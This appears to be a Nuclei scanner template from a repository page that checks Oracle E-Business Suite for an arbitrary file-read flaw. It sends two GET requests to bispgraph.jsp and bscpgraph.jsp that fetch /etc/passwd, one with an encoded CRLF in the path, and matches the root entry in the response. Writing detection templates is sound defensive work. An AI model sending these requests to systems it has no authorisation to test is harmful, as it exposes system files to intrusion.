nuclei-templates/vulnerabilities/oracle/oracle-ebs-bispgraph-file-a...

18 lines
424 B
YAML

id: oracle-ebs-bispgrapgh-file-read
info:
name: Oracle EBS Bispgraph File Access
author: "@emenalf & @tirtha_mandal"
severity: critical
requests:
- method: GET
path:
- "{{BaseURL}}/OA_HTML/bispgraph.jsp%0D%0A.js?ifn=passwd&ifl=/etc/"
- "{{BaseURL}}/OA_HTML/jsp/bsc/bscpgraph.jsp?ifl=/etc/&ifn=passwd"
matchers:
- type: regex
regex:
- "root:[x*]:0:0:"
part: body